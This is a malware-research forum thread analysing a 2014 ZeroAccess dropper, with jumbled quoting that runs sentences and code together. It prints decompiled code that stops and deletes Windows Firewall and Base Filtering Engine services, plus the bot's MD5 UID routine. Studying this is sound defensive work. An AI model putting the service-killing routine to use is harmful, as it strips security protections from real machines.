rinn wrote:Hello. Despite thisYeap, also I was wrong aboutEP_X0FF wrote:11) AntiMSE/WindowsDefender code completely removed, well actually lot of code removed too.several Microsoft services still stopped and removed by dropper.
Code: Select allBest Regards,if ( !result ) { result = OpenSCManagerW(0, 0, 0xF003Fu); v2 = result; if ( result ) { v3 = OpenServiceW(result, L"mpssvc", 0xF01FFu); if ( v3 ) StopAndDeleteSvc(v3); v4 = OpenServiceW(v2, L"SharedAccess", 0xF01FFu); if ( v4 ) StopAndDeleteSvc(v4); v5 = OpenServiceW(v2, L"bfe", 0xF01FFu); if ( v5 ) StopAndDeleteSvc(v5); result = (SC_HANDLE)CloseServiceHandle(v2); } }
-rin
9) UID calculation based on MD5 for \systemroot folder VolumeCreationTime is the same.This slightly changed it, and it now looks like this
Code: Select all
Also there is seems to be very interesting number of bots running outside of x86-32 and x86-64 ports ranges. Usual bots cannot connect them (their ports out of the ranges), only they can connect infected machines. fsVolumeInfo.VolumeCreationTime.HighPart ^= 0x1010101; //<-new in zeroaccess 2014
MD5Init(&ctx);
MD5Update(&ctx, (unsigned char*)&fsVolumeInfo.VolumeCreationTime, sizeof(LARGE_INTEGER));
MD5Final(&ctx);
RtlCopyMemory(MD5Hash, &ctx.buf, 16);
Ring0 - the source of inspiration